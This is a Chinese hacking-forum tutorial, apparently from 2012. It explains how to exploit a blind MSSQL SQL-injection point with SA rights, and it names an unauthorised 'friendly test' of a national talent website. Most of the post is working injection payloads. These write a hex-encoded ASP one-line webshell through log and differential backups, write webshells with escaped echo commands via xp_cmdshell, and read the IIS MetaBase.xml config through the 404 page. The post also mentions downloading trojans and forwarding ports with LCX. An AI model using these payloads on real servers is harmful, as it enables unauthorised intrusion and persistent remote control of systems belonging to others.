找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2574|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————$ m6 S! y9 ~% @, l

* @* x; {2 E9 \+ g
, G& R, y% x. y, M- t* j                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
: q5 i3 T# b9 D3 [
, K1 Q% c! ?, g4 d7 [1 \& Y' f                                                                 
) G: E4 e+ a. d                                                                 + `' Q. E) q7 o
                                                                  论坛: http://www.90team.net/$ g- ^. G/ [: ?; s: i$ e
# x# r# e3 C$ W# w! h5 S7 n& J

0 o' j; p) m/ O# u6 Q- r% `8 N3 \' s( \- a  m5 f
友情检测国家人才网
2 U' [: c$ x7 @& c8 i9 I6 ]. I( E7 U: v; e

% x+ ?! z3 x$ q; I/ [( l8 V内容:MSSQL注入SA权限不显错模式下的入侵, u! n) t0 e7 W+ `: i# W

7 ^7 }0 _* F# `6 R1 Z
! ]: k/ b$ G4 A一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
9 P5 E0 P/ Q7 y# g* o2 b! D  w8 U* M1 N+ x5 L1 ~0 X
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。0 Z7 @& W/ H; p7 y6 w
) u# \. K3 y! A) Y4 W+ [) M/ I
  V2 `, i  n' w: p! z- |2 d1 c. G
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。! T! @, g# f- U1 G1 K! F7 l% ?

# P; U' u" b2 B/ k. U% b- Q思路:" X0 t: E5 t) V% I

4 P; |, q! K4 x( s; g' D首先:+ Y" Z% c! C! s
( Z' K7 h/ A: m
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。" K' r- m* L. f6 J) W( `! M

& ]1 l" ~) H7 A  A7 p0 X# ~1.日志备份获得Webshell0 U/ U$ \! O6 F! v
( ~/ P( b; N' W
2.数据库差异备份获得Webshell# W# b, @  g2 j# z2 x
8 N. s7 A# C2 I) F  k' A5 }
4.直接下载免杀远控木马。
" d  P' X9 ~% G% j+ G& v8 s6 a7 f$ c) u2 ]% y% I2 b, k' l; l3 r7 L9 A/ j
5.直接下载LCX将服务器端口转发出来
3 F! }- U# v! ~! S/ U/ R) U, p! w3 \2 O( Z" h; c3 O; O
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。$ \, q- U! h* W6 D) @8 G

& V4 }1 z! L. j  @8 _
$ {7 I$ S- L5 g1 w1 Z+ Q5 d9 h0 C) V9 T( a7 k; |  i2 y/ }: p  [
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 0 N" a" [& V9 d' b) e
$ D* N+ \1 |+ g# s
我直接演示后面一个方法
. j+ F8 O2 I1 l9 E1 T5 P; A) T5 l
# h; f& \# }2 w, |. i3 h$ P$ `) p. y( S9 ~" q' O* n0 \2 ]
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL ( A; ^5 H/ X! ^. |8 y: z8 r: u9 n

; x& V0 S$ n6 E- e( o/ Z3 P4 s, Z
- w2 A' F- n3 M' O
1 k& N: W& b) G* C% }& ^" l/ J
: F% z1 d. c0 n3 `% e1 c◆日志备份:
, Y- j- e, r- Y5 K& }- |" y! f  l! }" ?; |+ N7 i
3 J/ n& h- f8 {: T( s: d# l
1. 进行初始备份
' |5 V. d9 g# |. ?5 e1 y; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
+ ?$ d" l" w$ q# D" Q% ~8 m( L1 q& n7 ^6 E% r! d$ X6 e
2. 插入数据
: p, [3 |7 D  U) y5 `$ j' {2 ~;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
6 O% W) O3 p. P  S) Z$ q$ A& ]
2 v# a9 G/ {* y0 e; {0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
; v1 D4 \, V. A6 L9 S; P  : [* b* ]9 i/ W
3. 备份并获得文件,删除临时表9 e1 d1 U0 `  F& h$ f0 @
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
2 g( S8 k+ S5 G; M
7 `: f. L0 g- {) ^
+ @3 ^0 J2 ?7 S1 @3 M* w9 q; b% c8 M2 i/ m4 O6 M# |5 {
◆数据库差异备份8 P' K( h+ p- Z* U, j. B2 D4 X3 D
: j4 c; y7 M9 d/ \7 W
(1. 进行差异备份准备工作+ x* J; ]; F7 J, N1 w7 l8 G

6 A. ]8 ]" d+ w+ {' y;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
# c* o; w. K  L* P6 ^
. G* u# s1 S' f上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码8 @! t& O" a* f9 S' _& |1 D
# n, J8 @- ~& r$ S: @

& q- g# W- |! T7 U% G(2. 将数据写入到数据库' F5 P0 n0 C5 }  k
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- . C5 E0 x5 Z. }

; l, W! J1 X1 b9 H; n0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
8 K6 }6 ^* w5 Y# i7 b, T
& _  w/ J% D9 o3. 备份数据库并清理临时文件, s/ V8 i9 K5 d9 X: q5 P4 j

1 v! u, `4 `4 b& I7 r5 M;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
, Z* x- C0 M9 [/ [' u5 G# q
/ m0 D5 n% Y! c) H7 C, G0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 7 S1 ~3 A, L8 M

! a" l9 |+ ]: ], s& u
6 m8 e7 N, o6 ^! B+ F9 [) c
; T; O+ R  i$ S# f3 t  `用^转义字符来写ASP(一句话木马)文件的方法:   ( |# {3 N8 g" n% {( p' N3 q- S

8 _, i6 I' G- b, S' G3 Y$ ]1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
* P' f  m5 |9 E+ B* i, W: @; L4 u) L  q9 ^
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp : h8 Q4 Q  Z: F2 @9 G, D4 ~, G$ m
# R: o  n" l4 h! d# r( [8 N0 M  m
读取IIS配置信息获取web路径9 e7 D% Y$ C  X: U5 g& N

6 {1 r' D/ o. ~* P) `     
* C9 }  g9 M9 u1 X/ h' t     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
2 s8 b" w& k% ~5 s) V
' O3 B3 g, |9 M% Q, Q0 z6 r. R执行命令, Z6 }0 p( S* t( s
     ( ?1 l3 D* n% \8 H4 x6 ~; v) P
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
2 ^+ f7 d$ h* m/ }& t
3 o1 u0 v* k8 O8 t# U/ e, u: c) k5 T* j  ~6 D, s- a
) b, `1 t7 ^: _8 Q" b" c
: j  R; [$ ^! |0 }3 s" {: |
) J! S: @/ _! t& L9 Z  J' M

( {4 b" d3 ]$ u6 G6 Y7 e9 S" M/ _' o  S0 V, V8 r; U" D

( r1 i# V6 ^% ]7 J% {8 R  J6 x( N" ?# J& b0 n0 s+ ]8 {

' w6 L  w# T0 Y; z8 ^% n. a% d2 z1 J9 U$ f% r4 v. R( T7 f: s

1 `7 R. N( ?8 Y6 e) P) {! d( X7 P4 u6 K: [* e- j
% p# r  u5 j" X5 L! e

1 x! U+ r& `8 M" p
" Z0 P: g0 I+ t- R- \  N9 |1 e% ?: ]/ n
0 @, y6 G  d: x

6 n9 |- \8 R/ |. O
5 n2 d0 W  l! L" O# G  t* m0 |
: E6 E3 \- ]& Q; A- T: I9 Z+ F2 r# n; X7 }
* f4 f: l  t7 N+ j4 [, p

, U& U- r* K% n# F$ h2 G
: A' q6 J3 b4 r8 J+ ?) `2 m
2 G1 Z" V- R8 X4 E$ g/ ]  O& x" {' g  y! D7 B

6 D. q$ I% Z5 V( g
. ?" z: D" y! j- }8 j+ F' L! J9 t! X8 t/ Y

6 y$ h2 b7 m8 Z1 V( U. B: b! T& c$ C7 j2 e! P# k' Y: l- F3 Q
- O/ d+ d' s# j6 R7 Y! }

; p& \: O  H( x! U2 t( y, [8 ]+ y' L4 g
2 u7 {, ]1 m7 G: i, m) ~& ^, @" B8 |7 _9 k. V
" c. D, F* R2 e, J6 R/ e

: B, z3 I% q& z. @# W
# \7 ]. e% w6 o! n! ]( T, ]& R8 Z& M3 \
0 D: Y. p8 r' G" G- N: X. w% m4 F
6 W+ W+ |% q7 L3 l, c9 p

: J& z! t* B* t9 @) Y2 E1 ]3 t/ p
6 u2 |, `' W# ~- _
7 w. s7 n' q: e8 Y+ [) `9 }  I& g
+ B+ Y, Y8 [+ D% o6 X# A" g$ A+ G9 G2 H7 }8 Z
7 `: x) }( J2 v/ X0 O/ e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表